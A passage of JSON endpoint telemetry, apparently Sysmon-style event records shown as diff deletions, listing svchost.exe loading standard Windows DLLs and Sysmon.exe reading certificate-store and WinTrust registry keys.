"svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "qmgr.dll", - "image_path": "C:\\Windows\\System32\\qmgr.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877140000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570877300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 